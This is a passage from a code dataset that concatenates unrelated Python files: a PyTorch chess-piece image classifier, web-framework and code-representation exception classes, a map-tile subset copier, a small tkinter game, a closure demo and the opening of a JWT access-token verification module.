        GPU: when True, run the model and batches on CUDA if available.
    """
    data = getFilesAndLabels()
    dataset = DataSet(data)
    model = Net()
    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
    if GPU:
        print(device)
        model.to(device)
    loss_func = nn.CrossEntropyLoss()
    # 80/20 train/test split over dataset indices.
    tess = math.floor(len(data) * 0.2)
    trss = len(data) - tess
    train_subsamples, test_subsamples = torch.utils.data.random_split(range(len(data)), [trss, tess])
    train_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
                                               num_workers=0, sampler=train_subsamples)
    test_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
                                              num_workers=0, sampler=test_subsamples)
    optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
    train_acc = []
    test_acc = []
    train_loss = []
    test_loss = []
    summary(model, (1, 128, 128))
    for epoch in range(epochs):
        model.train()
        train_num_correct = 0
        test_num_correct = 0
        for inp, label in train_loader:
            if GPU:
                inp = inp.to(device)
                label = label.to(device)
            optimizer.zero_grad()
            cur_pre = model(inp)
            loss = loss_func(cur_pre, label.long())
            # Log the detached scalar: appending the live loss tensor
            # kept every batch's autograd graph alive (memory leak).
            train_loss.append([loss.item(), epoch])
            # Count correct predictions in this batch ('j' no longer
            # shadows the batch index as the inner 'i' used to).
            for j in range(cur_pre.shape[0]):
                if label[j] == torch.argmax(cur_pre[j]):
                    train_num_correct += 1
            loss.backward()
            optimizer.step()
        # Evaluation mode: disables dropout/batch-norm updates (was missing).
        model.eval()
        with torch.no_grad():
            for inp, label in test_loader:
                if GPU:
                    inp = inp.to(device)
                    label = label.to(device)
                cur_pre = model(inp)
                loss = loss_func(cur_pre, label.long())
                test_loss.append([loss.item(), epoch])
                for j in range(cur_pre.shape[0]):
                    if label[j] == torch.argmax(cur_pre[j]):
                        test_num_correct += 1
        train_acc.append(train_num_correct / trss)
        test_acc.append(test_num_correct / tess)
        print(f'Finished Epoch {epoch + 1}')
        print(f'Train Acc: {train_acc}')
        print(f'Test Acc: {test_acc}')
        print(f'Train Loss: {train_loss}')
        print(f'Test Loss: {test_loss}')
    train_acc = np.array(train_acc)
    test_acc = np.array(test_acc)
    # Save to a file inside SAVE_DIR: torch.save() to the directory path
    # itself (as before) raises an error.
    torch.save(model.state_dict(), os.path.join(SAVE_DIR, 'model.pt'))
    np.savetxt(os.path.join(SAVE_DIR, 'trainAcc.csv'), train_acc, delimiter=',')
    np.savetxt(os.path.join(SAVE_DIR, 'testAcc.csv'), test_acc, delimiter=',')


train(GPU=True)
import os
import torch
import torch.nn as nn
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
import math
from PIL import Image
from torchsummary import summary
from numpy import asarray
image_dir = "/content/Images"
SAVE_DIR = "/content/Results"
piece_dir = {}
batch_size = 128
image_size = (128, 128) # Subject to change
epochs = 50
def popPeiceDir():
for dir in os.listdir(image_dir):
if dir.startswith('.'):
continue
piece_dir[dir] = os.path.join(image_dir, dir)
popPeiceDir()
# Empty Square = 0, Pawn = 1, King = 2, Queen = 3, Rook = 4, Bishop = 5, Knight = 6
def getFilesAndLabels():
fl = []
for key in piece_dir:
if key == "Testimg" or key == "Testimg2":
continue
for file in os.listdir(piece_dir[key]):
if file.startswith('.'):
continue
label = -1
if key == "BB" or key == "WB":
label = 5
if key == "BK" or key == "WK":
label = 6
if key == "BKi" or key == "WKi":
label = 2
if key == "BP" or key == "WP":
label = 1
if key == "BQ" or key == "WQ":
label = 3
if key == "BR" or key == "WR":
label = 4
if key == "Empty":
label = 0
assert label != -1
fl.append([os.path.join(piece_dir[key], file), label])
return fl
def transformImg(img):
preproc = transforms.Compose([transforms.Grayscale(),
transforms.Resize(image_size), transforms.ToTensor(),
transforms.Normalize((0.5), (0.5))])
return preproc(img)
def getArr(image_path):
img = Image.open(image_path)
img = transformImg(img)
return img
class DataSet(Dataset):
def __init__(self, files_labels):
self.fl = files_labels
self.count = 0
def __len__(self):
return len(self.fl)
def __getitem__(self, index):
img_arr = getArr(self.fl[index][0])
#label = torch.tensor([0, 0, 0, 0, 0, 0, 0])
#label[self.fl[index][1]] = 1
label = self.fl[index][1]
return img_arr.float(), label
# Starting Image dims, Maxpooling Kernal, number of times maxpool is called in CNN, number of conv channels
def findFCFeatures(images_size, maxpooling, num_maxpool, num_channels):
x, y = images_size
mx, my = maxpooling
for i in range(num_maxpool):
x = math.floor(((x - (mx - 1) - 1) / mx) + 1)
y = math.floor(((y - (my - 1) - 1) / my) + 1)
return x * y * num_channels
def double_conv(in_channels, out_channels):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.LeakyReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, 3, padding=1),
nn.LeakyReLU(inplace=True))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv_down1 = double_conv(1, 32)
self.conv_down2 = double_conv(32, 64)
self.conv_down3 = double_conv(64, 128)
self.conv_down4 = double_conv(128, 256)
self.maxpool = nn.MaxPool2d((2, 2))
self.fc1 = nn.Linear(findFCFeatures(image_size, (2, 2), 3, 256), 7)
def forward(self, x):
conv1 = self.conv_down1(x)
x = self.maxpool(conv1)
conv2 = self.conv_down2(x)
x = self.maxpool(conv2)
conv3 = self.conv_down3(x)
x = self.maxpool(conv3)
x = self.conv_down4(x)
x = x.view(-1, findFCFeatures(image_size, (2, 2), 3, 256))
x = self.fc1(x)
return x
def train(GPU=True):
data = getFilesAndLabels()
# print(data)
dataset = DataSet(data)
model = Net()
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
if GPU:
print(device)
model.to(device)
w = torch.tensor(np.array([1, 1, 1, 1, 1, 1, 1]))
loss_func = nn.CrossEntropyLoss()
tess = math.floor(len(data) * 0.2)
trss = len(data) - tess
train_subsamples, test_subsamples = torch.utils.data.random_split(range(len(data)), [trss, tess])
train_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
num_workers=0, sampler=train_subsamples)
test_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
num_workers=0, sampler=test_subsamples)
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
train_acc = []
test_acc = []
train_loss = []
test_loss = []
summary(model, (1, 128, 128))
for epoch in range(epochs):
model.train()
train_num_correct = 0
test_num_correct = 0
for i, (inp, label) in enumerate(train_loader):
if GPU:
inp = inp.to(device)
label = label.to(device)
optimizer.zero_grad()
cur_pre = model(inp)
loss = loss_func(cur_pre, label.long())
train_loss.append([loss, epoch])
for i in range(cur_pre.shape[0]):
if label[i] == torch.argmax(cur_pre[i]):
train_num_correct += 1
# print('ML Started')
loss.backward()
optimizer.step()
with torch.no_grad():
for i, (inp, label) in enumerate(test_loader):
if GPU:
inp = inp.to(device)
label = label.to(device)
cur_pre = model(inp)
loss = loss_func(cur_pre, label.long())
test_loss.append([loss, epoch])
for i in range(cur_pre.shape[0]):
if label[i] == torch.argmax(cur_pre[i]):
test_num_correct += 1
train_acc.append(train_num_correct / trss)
test_acc.append(test_num_correct / tess)
print(f'Finished Epoch {epoch + 1}')
print(f'Train Acc: {train_acc}')
print(f'Test Acc: {test_acc}')
print(f'Train Loss: {train_loss}')
print(f'Test Loss: {test_loss}')
train_acc = np.array(train_acc)
test_acc = np.array(test_acc)
torch.save(model.state_dict(), SAVE_DIR)
np.savetxt(os.path.join(SAVE_DIR, 'trainAcc.csv'), train_acc, delimiter=',')
np.savetxt(os.path.join(SAVE_DIR, 'testAcc.csv'), test_acc, delimiter=',')
train(GPU=True) | en | 0.771856 | # Subject to change # Empty Square = 0, Pawn = 1, King = 2, Queen = 3, Rook = 4, Bishop = 5, Knight = 6 #label = torch.tensor([0, 0, 0, 0, 0, 0, 0]) #label[self.fl[index][1]] = 1 # Starting Image dims, Maxpooling Kernal, number of times maxpool is called in CNN, number of conv channels # print(data) # print('ML Started') | 2.370561 | 2 |
bocadillo/exceptions.py | Inconnu08/bocadillo | 0 | 6614044 | <reponame>Inconnu08/bocadillo
from http import HTTPStatus
from typing import Union
from jinja2.exceptions import TemplateNotFound as _TemplateNotFound
# Alias: re-export Jinja2's TemplateNotFound under this module's namespace
# so callers need not import jinja2 directly.
TemplateNotFound = _TemplateNotFound
class HTTPError(Exception):
    """Raised when an HTTP error occurs.

    You can raise this within a view or an error handler to interrupt
    request processing.

    # Args:
        status: an HTTP status code (e.g. 404) or an `HTTPStatus` member.

    # Raises:
        TypeError: if `status` is neither an int nor an `HTTPStatus`.
    """

    def __init__(self, status: Union[int, HTTPStatus]):
        if isinstance(status, int):
            # HTTPStatus(404) -> HTTPStatus.NOT_FOUND; HTTPStatus members
            # are themselves ints, so they pass through unchanged.
            status = HTTPStatus(status)
        elif not isinstance(status, HTTPStatus):
            # Raise instead of assert: asserts are stripped under `-O`,
            # which would silently accept an invalid status value.
            raise TypeError(f"Expected int or HTTPStatus, got {type(status)}")
        self._status = status

    @property
    def status_code(self) -> int:
        """Return the HTTP error's status code, i.e. 404."""
        return self._status.value

    @property
    def status_phrase(self) -> str:
        """Return the HTTP error's status phrase, i.e. `"Not Found"`."""
        return self._status.phrase

    def __str__(self):
        return f"{self.status_code} {self.status_phrase}"
class UnsupportedMediaType(Exception):
    """Raised when trying to use an unsupported media type."""

    def __init__(self, media_type, available):
        self._media_type = media_type
        self._available = available

    def __str__(self):
        options = ", ".join(self._available)
        return f"{self._media_type} (available: {options})"
| from http import HTTPStatus
from typing import Union
from jinja2.exceptions import TemplateNotFound as _TemplateNotFound
# Alias
TemplateNotFound = _TemplateNotFound
class HTTPError(Exception):
"""Raised when an HTTP error occurs.
You can raise this within a view or an error handler to interrupt
request processing.
"""
def __init__(self, status: Union[int, HTTPStatus]):
if isinstance(status, int):
status = HTTPStatus(status)
else:
assert isinstance(
status, HTTPStatus
), f"Expected int or HTTPStatus, got {type(status)}"
self._status = status
@property
def status_code(self) -> int:
"""Return the HTTP error's status code, i.e. 404."""
return self._status.value
@property
def status_phrase(self) -> str:
"""Return the HTTP error's status phrase, i.e. `"Not Found"`."""
return self._status.phrase
def __str__(self):
return f"{self.status_code} {self.status_phrase}"
class UnsupportedMediaType(Exception):
"""Raised when trying to use an unsupported media type."""
def __init__(self, media_type, available):
self._media_type = media_type
self._available = available
def __str__(self):
return f'{self._media_type} (available: {", ".join(self._available)})' | en | 0.679034 | # Alias Raised when an HTTP error occurs. You can raise this within a view or an error handler to interrupt request processing. Return the HTTP error's status code, i.e. 404. Return the HTTP error's status phrase, i.e. `"Not Found"`. Raised when trying to use an unsupported media type. | 2.745303 | 3 |
src/wai/common/meta/code_repr/_error.py | waikato-datamining/wai-common | 0 | 6614045 | <filename>src/wai/common/meta/code_repr/_error.py
"""
Module containing error types for when problems occur during
handling of code representations.
"""
from typing import Any
class CodeRepresentationError(Exception):
"""
Type of error occurring when there is a problem getting the
code-representation of a value.
"""
pass
class IsNotCodeRepresentableValue(CodeRepresentationError):
"""
Error for when a value is not code-representable.
"""
def __init__(self, value: Any):
super().__init__(f"Value '{value}' is not code-representable")
class IsNotCodeRepresentableType(CodeRepresentationError):
"""
Error for when a type is not code-representable.
"""
def __init__(self, cls: type):
super().__init__(f"Type '{cls.__qualname__}' is not code-representable")
class ConflictingImports(CodeRepresentationError):
    """
    Error for when combining import dictionaries and there is
    more than one import under a given identifier.
    """
    def __init__(self, identifier: str, import_code_1: str, import_code_2: str):
        # Same message layout as before: header line, first import,
        # "<->" separator, second import.
        message = "\n".join([
            f"Multiple conflicting imports with name '{identifier}'",
            import_code_1,
            "<->",
            import_code_2,
        ])
        super().__init__(message)
| <filename>src/wai/common/meta/code_repr/_error.py
"""
Module containing error types for when problems occur during
handling of code representations.
"""
from typing import Any
class CodeRepresentationError(Exception):
"""
Type of error occurring when there is a problem getting the
code-representation of a value.
"""
pass
class IsNotCodeRepresentableValue(CodeRepresentationError):
"""
Error for when a value is not code-representable.
"""
def __init__(self, value: Any):
super().__init__(f"Value '{value}' is not code-representable")
class IsNotCodeRepresentableType(CodeRepresentationError):
"""
Error for when a type is not code-representable.
"""
def __init__(self, cls: type):
super().__init__(f"Type '{cls.__qualname__}' is not code-representable")
class ConflictingImports(CodeRepresentationError):
"""
Error for when combining import dictionaries and there is
more than one import under a given identifier.
"""
def __init__(self, identifier: str, import_code_1: str, import_code_2: str):
super().__init__(f"Multiple conflicting imports with name '{identifier}'\n"
f"{import_code_1}\n"
f"<->\n"
f"{import_code_2}")
| en | 0.857507 | Module containing error types for when problems occur during handling of code representations. Type of error occurring when there is a problem getting the code-representation of a value. Error for when a value is not code-representable. Error for when a type is not code-representable. Error for when combining import dictionaries and there is more than one import under a given identifier. | 2.523816 | 3 |
src/basic/expression_evaluator/compiler/node_traversal/__init__.py | chuanhao01/Python_Expression_Evaluator | 0 | 6614046 | <reponame>chuanhao01/Python_Expression_Evaluator
from .pre_order import PreOrder
from .in_order import InOrder
from .post_order import PostOrder | from .pre_order import PreOrder
from .in_order import InOrder
from .post_order import PostOrder | none | 1 | 1.042759 | 1 | |
mapswipe_select_tile_subset.py | JHP4911/mapswipe_utils | 1 | 6614047 | <reponame>JHP4911/mapswipe_utils
#!/usr/local/bin/python3
# mapswipe_select_tile_subset.py
# Copyright 2017 <NAME> <EMAIL>
# Project repo: https://github.com/craic/mapswipe_utils
# Released under the terms of the MIT License
# Given a directory of bing tile images and a file of tile ids,
# Copy selected tiles to the output directory
# includes an --action arg to include or exclude the list
# tilelist can be a list of :
# tile_IDs e.g. 18-146363-145067
# file names e.g. 18-146363-145067.jpg
# CSV lines where the ID is the first field
# e.g. 18-147207-144806,positive
import argparse
import sys
import os
import shutil
import re
def main():
parser = argparse.ArgumentParser(description="Select a subset of map tiles based on a file of tile IDs")
parser.add_argument('--tilelist', '-t', metavar='<tile_list_file>', required=True,
help='File of tile IDs')
parser.add_argument('--indir', '-i', metavar='<input_directory>', required=True,
help='Input Directory')
parser.add_argument('--outdir', '-o', metavar='<output_directory>', required=True,
help='Output Directory')
parser.add_argument('--action', '-a', metavar='<action>', default='include',
help='action is to include (default) or exclude the supplied tile IDs')
args = parser.parse_args()
tile_list_file = args.tilelist
input_dir = args.indir
output_dir = args.outdir
action = args.action
# Load the tile IDs
# tile ID is the first field
tile_ids = []
lines = []
with open(tile_list_file, 'rt') as f:
lines = f.read().splitlines()
# Handle various inputs - extract IDs like 18-147209-144812
tile_id_pattern = re.compile(r'^(\d+-\d+-\d+)')
for line in lines:
m = tile_id_pattern.search(line)
if m:
tile_ids.append(m.group(0))
tile_hash = {}
for tile_id in tile_ids:
tile_hash[tile_id] = 1
# create output directory if it doesn't exist
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# List the input directory and copy files if appropriate
for filename in os.listdir(input_dir):
if filename.endswith(".jpg"):
input_id = filename.replace('.jpg', '')
if input_id in tile_hash:
if action == 'include':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
else:
if action == 'exclude':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
main()
| #!/usr/local/bin/python3
# mapswipe_select_tile_subset.py
# Copyright 2017 <NAME> <EMAIL>
# Project repo: https://github.com/craic/mapswipe_utils
# Released under the terms of the MIT License
# Given a directory of bing tile images and a file of tile ids,
# Copy selected tiles to the output directory
# includes an --action arg to include or exclude the list
# tilelist can be a list of :
# tile_IDs e.g. 18-146363-145067
# file names e.g. 18-146363-145067.jpg
# CSV lines where the ID is the first field
# e.g. 18-147207-144806,positive
import argparse
import sys
import os
import shutil
import re
def main():
parser = argparse.ArgumentParser(description="Select a subset of map tiles based on a file of tile IDs")
parser.add_argument('--tilelist', '-t', metavar='<tile_list_file>', required=True,
help='File of tile IDs')
parser.add_argument('--indir', '-i', metavar='<input_directory>', required=True,
help='Input Directory')
parser.add_argument('--outdir', '-o', metavar='<output_directory>', required=True,
help='Output Directory')
parser.add_argument('--action', '-a', metavar='<action>', default='include',
help='action is to include (default) or exclude the supplied tile IDs')
args = parser.parse_args()
tile_list_file = args.tilelist
input_dir = args.indir
output_dir = args.outdir
action = args.action
# Load the tile IDs
# tile ID is the first field
tile_ids = []
lines = []
with open(tile_list_file, 'rt') as f:
lines = f.read().splitlines()
# Handle various inputs - extract IDs like 18-147209-144812
tile_id_pattern = re.compile(r'^(\d+-\d+-\d+)')
for line in lines:
m = tile_id_pattern.search(line)
if m:
tile_ids.append(m.group(0))
tile_hash = {}
for tile_id in tile_ids:
tile_hash[tile_id] = 1
# create output directory if it doesn't exist
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# List the input directory and copy files if appropriate
for filename in os.listdir(input_dir):
if filename.endswith(".jpg"):
input_id = filename.replace('.jpg', '')
if input_id in tile_hash:
if action == 'include':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
else:
if action == 'exclude':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
main() | en | 0.674702 | #!/usr/local/bin/python3 # mapswipe_select_tile_subset.py # Copyright 2017 <NAME> <EMAIL> # Project repo: https://github.com/craic/mapswipe_utils # Released under the terms of the MIT License # Given a directory of bing tile images and a file of tile ids, # Copy selected tiles to the output directory # includes an --action arg to include or exclude the list # tilelist can be a list of : # tile_IDs e.g. 18-146363-145067 # file names e.g. 18-146363-145067.jpg # CSV lines where the ID is the first field # e.g. 18-147207-144806,positive # Load the tile IDs # tile ID is the first field # Handle various inputs - extract IDs like 18-147209-144812 # create output directory if it doesn't exist # List the input directory and copy files if appropriate | 2.988113 | 3 |
easter_egg.py | Robot-Inventor/ORIZIN_Agent | 0 | 6614048 | <filename>easter_egg.py<gh_stars>0
# -*- coding: utf8 -*-
import tkinter as tk
import time
import random
import re
import atexit
import subprocess
startMessage = True
shipX = 240
shipY = 200
rivalBeam = []
rivalBeamCount = 0
beamSpeed = 400
gameOver = 0
def shutdown(event):
quit()
def autoShutdown():
quit()
def spacePressed(event):
global startMessage
if startMessage == True:
startMessage = False
gameTitle.destroy()
promptStart.destroy()
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
howToPlay = tk.Label(gameCanvas, text='矢印キーで左右へ', bg='black', fg='red', font=('', 13, 'bold', 'roman', 'normal', 'normal'))
howToPlay.pack(anchor=tk.NW, expand=1)
root.after(beamSpeed, moveThings)
beamSound()
changeBeamSpeed()
def leftPressed(event):
global shipX
if startMessage == False:
if shipX >= 20:
shipX -= 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def rightPressed(event):
global shipX
if startMessage == False:
if shipX <= 460:
shipX += 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def moveThings():
global rivalBeam
global rivalBeamCount
rivalBeamLen = int(len(rivalBeam) / 3)
corsor = 0
for num in range(rivalBeamLen):
IDPrace = corsor
XPrace = corsor + 1
YPrace = corsor + 2
corsor += 3
rivalBeamID = rivalBeam[IDPrace]
rivalBeamX = rivalBeam[XPrace]
rivalBeamY = rivalBeam[YPrace]
gameCanvas.delete(rivalBeamID)
gameCanvas.create_line(int(rivalBeamX), int(rivalBeamY) + 20, int(rivalBeamX), int(rivalBeamY) + 40, fill='yellow', tag=rivalBeamID)
rivalBeam[YPrace] = str(int(rivalBeamY) + 20)
if int(rivalBeam[YPrace]) <= 200 and int(rivalBeam[YPrace]) >= 180 and int(rivalBeam[XPrace]) >= shipX and int(rivalBeam[XPrace]) <= shipX + 20:
global gameOver
gameOver += 1
gameOver = tk.Label(gameCanvas, text='Game Over', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameOver.pack(side=tk.TOP, expand=0, fill=tk.BOTH)
beamSound('/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/bomb1.wav')
root.after(3000, autoShutdown)
if int(rivalBeam[YPrace]) <= 0:
rivalBeam.pop(0)
rivalBeam.pop(1)
rivalBeam.pop(2)
X = random.randrange(0, 500, 20)
gameCanvas.create_line(X, 0, X, 20, fill='yellow', tag='rivalBeam' + str(rivalBeamCount))
rivalBeam.append('rivalBeam' + str(rivalBeamCount))
rivalBeam.append(str(X))
rivalBeam.append('0')
rivalBeamCount += 1
root.after(beamSpeed, moveThings)
def playSound(soundFile):
command = 'aplay ' + soundFile
global soundPlayer
soundPlayer = subprocess.Popen(command.split())
def beamSound(soundFile='/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/laser1.wav'):
command = 'aplay ' + soundFile
subprocess.Popen(command.split())
root.after(1000, beamSound)
def stopSound():
soundPlayer.terminate()
def changeBeamSpeed():
global beamSpeed
beamSpeed -= 2
root.after(300, changeBeamSpeed)
atexit.register(stopSound)
root = tk.Tk()
root.title('ORIZIN Easter Egg')
root.geometry("500x300")
root.bind('<Control-q>', shutdown)
root.bind('<Left>', leftPressed)
root.bind('<Right>', rightPressed)
root.bind('<space>', spacePressed)
playSound('/home/pi/ORIZIN_Agent/sounds/musics/wav/natsuhasummer.wav')
gameCanvas = tk.Canvas(root, bg='black')
gameCanvas.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
gameTitle = tk.Label(gameCanvas, text='Space Battleship Game', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameTitle.pack(expand=0, fill=tk.BOTH)
promptStart = tk.Label(gameCanvas, text='スペースキーを押してスタート', bg='black', fg='red', font=('', 15, 'bold', 'roman', 'normal', 'normal'))
promptStart.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
root.mainloop()
| <filename>easter_egg.py<gh_stars>0
# -*- coding: utf8 -*-
import tkinter as tk
import time
import random
import re
import atexit
import subprocess
startMessage = True
shipX = 240
shipY = 200
rivalBeam = []
rivalBeamCount = 0
beamSpeed = 400
gameOver = 0
def shutdown(event):
quit()
def autoShutdown():
quit()
def spacePressed(event):
global startMessage
if startMessage == True:
startMessage = False
gameTitle.destroy()
promptStart.destroy()
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
howToPlay = tk.Label(gameCanvas, text='矢印キーで左右へ', bg='black', fg='red', font=('', 13, 'bold', 'roman', 'normal', 'normal'))
howToPlay.pack(anchor=tk.NW, expand=1)
root.after(beamSpeed, moveThings)
beamSound()
changeBeamSpeed()
def leftPressed(event):
global shipX
if startMessage == False:
if shipX >= 20:
shipX -= 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def rightPressed(event):
global shipX
if startMessage == False:
if shipX <= 460:
shipX += 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def moveThings():
global rivalBeam
global rivalBeamCount
rivalBeamLen = int(len(rivalBeam) / 3)
corsor = 0
for num in range(rivalBeamLen):
IDPrace = corsor
XPrace = corsor + 1
YPrace = corsor + 2
corsor += 3
rivalBeamID = rivalBeam[IDPrace]
rivalBeamX = rivalBeam[XPrace]
rivalBeamY = rivalBeam[YPrace]
gameCanvas.delete(rivalBeamID)
gameCanvas.create_line(int(rivalBeamX), int(rivalBeamY) + 20, int(rivalBeamX), int(rivalBeamY) + 40, fill='yellow', tag=rivalBeamID)
rivalBeam[YPrace] = str(int(rivalBeamY) + 20)
if int(rivalBeam[YPrace]) <= 200 and int(rivalBeam[YPrace]) >= 180 and int(rivalBeam[XPrace]) >= shipX and int(rivalBeam[XPrace]) <= shipX + 20:
global gameOver
gameOver += 1
gameOver = tk.Label(gameCanvas, text='Game Over', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameOver.pack(side=tk.TOP, expand=0, fill=tk.BOTH)
beamSound('/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/bomb1.wav')
root.after(3000, autoShutdown)
if int(rivalBeam[YPrace]) <= 0:
rivalBeam.pop(0)
rivalBeam.pop(1)
rivalBeam.pop(2)
X = random.randrange(0, 500, 20)
gameCanvas.create_line(X, 0, X, 20, fill='yellow', tag='rivalBeam' + str(rivalBeamCount))
rivalBeam.append('rivalBeam' + str(rivalBeamCount))
rivalBeam.append(str(X))
rivalBeam.append('0')
rivalBeamCount += 1
root.after(beamSpeed, moveThings)
def playSound(soundFile):
command = 'aplay ' + soundFile
global soundPlayer
soundPlayer = subprocess.Popen(command.split())
def beamSound(soundFile='/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/laser1.wav'):
command = 'aplay ' + soundFile
subprocess.Popen(command.split())
root.after(1000, beamSound)
def stopSound():
soundPlayer.terminate()
def changeBeamSpeed():
global beamSpeed
beamSpeed -= 2
root.after(300, changeBeamSpeed)
atexit.register(stopSound)
root = tk.Tk()
root.title('ORIZIN Easter Egg')
root.geometry("500x300")
root.bind('<Control-q>', shutdown)
root.bind('<Left>', leftPressed)
root.bind('<Right>', rightPressed)
root.bind('<space>', spacePressed)
playSound('/home/pi/ORIZIN_Agent/sounds/musics/wav/natsuhasummer.wav')
gameCanvas = tk.Canvas(root, bg='black')
gameCanvas.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
gameTitle = tk.Label(gameCanvas, text='Space Battleship Game', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameTitle.pack(expand=0, fill=tk.BOTH)
promptStart = tk.Label(gameCanvas, text='スペースキーを押してスタート', bg='black', fg='red', font=('', 15, 'bold', 'roman', 'normal', 'normal'))
promptStart.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
root.mainloop()
| en | 0.406466 | # -*- coding: utf8 -*- | 2.82461 | 3 |
Decorators'@'/Closure.py | shubham-11700069/Python | 0 | 6614049 | <filename>Decorators'@'/Closure.py<gh_stars>0
def outer_function(msg):
def inner_function():
print(msg)
return inner_function
hi_func=outer_function('Hi')
bye_func=outer_function('Bye')
hi_func()
bye_func()
| <filename>Decorators'@'/Closure.py<gh_stars>0
def outer_function(msg):
def inner_function():
print(msg)
return inner_function
hi_func=outer_function('Hi')
bye_func=outer_function('Bye')
hi_func()
bye_func()
| none | 1 | 2.939373 | 3 | |
flaat/access_tokens.py | BorjaEst/flaat | 1 | 6614050 | # This code is distributed under the MIT License
import base64
from dataclasses import dataclass
import logging
from typing import Optional, List
import jwt
from flaat.exceptions import FlaatUnauthenticated
from flaat.issuers import IssuerConfig
logger = logging.getLogger(__name__)
# Expand this list in a sensible way
PERMITTED_SIGNATURE_ALGORITHMS = [
"RS256",
"RS384",
"RS512",
]
def _base64_url_encode(data):
"""Decode base64 encode data"""
if not isinstance(data, bytes):
data = data.encode("utf-8")
encode = base64.urlsafe_b64encode(data)
return encode.decode("utf-8").rstrip("=")
@dataclass
class AccessTokenInfo:
"""Infos from a JWT access token"""
header: dict
""" The JWTs JOSE header """
body: dict
""" The JWTs data payload """
signature: str
""" The JWTs JWS signature """
verification: Optional[dict]
""" Infos about the verification of the JWT.
If set to `None`, then the JWT data is unverified."""
def __init__(self, complete_decode, verification=Optional[dict]):
self.header = complete_decode.get("header", {})
self.body = complete_decode.get("payload", {})
self.signature = _base64_url_encode(complete_decode.get("signature", b""))
self.verification = verification
@property
def issuer(self) -> str:
return self.body.get("iss", "")
class FlaatPyJWKClient(jwt.PyJWKClient):
"""Fixes the jwt.PyJWKClient class:
* get_signing_keys
* does not call self.get_jwk_set(), since it fails when "enc" keys are present
* returns only keys used for signing (e.g. filters out keys with "use" == "enc")
* get_signing_key_from_jwt
* tries to retrieve keys by id only if "kid" is specified in token header
* otherwise, it tries to infer the key type ("kty") from the algorithm used to sign the token ("alg")
* "alg" is always present in JWT header
* an additional method get_signing_key_by_alg
"""
def get_signing_keys(self) -> List[jwt.api_jwk.PyJWK]:
data = self.fetch_data()
# filter for signing keys, i.e. "use" in ["sig", None]
keys = [
key for key in data.get("keys", []) if key.get("use", None) in ["sig", None]
]
signing_keys = jwt.PyJWKSet(keys)
if not signing_keys:
raise jwt.exceptions.PyJWKClientError(
"The JWKS endpoint did not contain any signing keys"
)
return signing_keys.keys
def get_signing_key_by_alg(self, alg: str) -> jwt.api_jwk.PyJWK:
# algorithm is none, then signing key is None; signature must be empty octet string
if alg == "none":
return jwt.api_jwk.PyJWK({}, algorithm="none")
# infer key type from algorithm
key_type = ""
if alg.startswith("RS") or alg.startswith("PS"):
key_type = "RSA"
if alg.startswith("HS"):
key_type = "oct"
if alg.startswith("ES"):
key_type = "EC"
if alg.startswith("Ed"):
key_type = "OKP"
signing_keys = self.get_signing_keys()
signing_key = None
for key in signing_keys:
if key.key_type == key_type:
signing_key = key
break
if not signing_key:
raise jwt.exceptions.PyJWKClientError(
f'Unable to find a signing key that matches alg: "{alg}"'
)
return signing_key
def get_signing_key_from_jwt(self, token: str) -> jwt.api_jwk.PyJWK:
unverified = jwt.api_jwt.decode_complete(
token, options={"verify_signature": False}
)
header = unverified["header"]
kid = header.get("kid", None)
if kid:
return self.get_signing_key(kid)
# alg MUST be present, possible values defined at https://datatracker.ietf.org/doc/html/rfc7518#section-3.1
alg = header.get("alg", None)
if alg:
return self.get_signing_key_by_alg(alg)
raise FlaatUnauthenticated(
"Could not verify JWT: The token header did not contain an 'alg'."
)
def get_access_token_info(access_token, verify=True) -> Optional[AccessTokenInfo]:
unverified = {}
try:
unverified = jwt.api_jwt.decode_complete(
access_token,
options={
"verify_signature": False,
},
)
unverified_body = unverified.get("payload", {})
except jwt.DecodeError:
return None
if not verify:
return AccessTokenInfo(unverified, verification=None)
issuer = IssuerConfig.get_from_string(unverified_body.get("iss", ""))
if issuer is None:
raise FlaatUnauthenticated("Could not verify JWT: No 'iss' claim in body")
